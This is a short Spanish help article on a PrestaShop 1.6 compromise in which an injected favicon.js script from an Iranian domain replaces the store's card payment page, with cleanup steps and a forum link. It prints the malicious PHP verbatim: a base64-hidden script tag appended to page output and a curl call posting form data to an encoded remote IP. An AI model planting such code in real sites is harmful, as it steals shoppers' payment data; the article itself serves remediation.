PrestaShop 1.6 hack favicon.js avir.ir pagina pedidos con tarjeta

En el código fuente de la web de PrestaShop aparece al final un código extraño que hace saltar algunos antivirus como el Malware Bytes:

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script>

Este problema surge por un problema de seguridad de la versión de PrestaShop 1.6 o de algún módulo de terceros, aún no está claro.


El código inyectado provoca que el pago con tarjeta de la tienda cambie y se sustituya por otro:




Para solucionarlo temporalmente debes revisar los archivos:


  • classes/controller/Controller.php
  • classes/controller/AdminController.php



Y buscar y eliminar los siguientes bloques de códigos:


$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');
try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}


Más info sobre este problema en el Foro Oficial de PrestaShop:


https://www.prestashop.com/forums/topic/1045556-order-pages-calling-a-malicious-script-faviconjs/


¿Ha sido útil esta respuesta? No

Enviar comentario
Por favor ayúdanos a mejorar dejando tus ideas o comentarios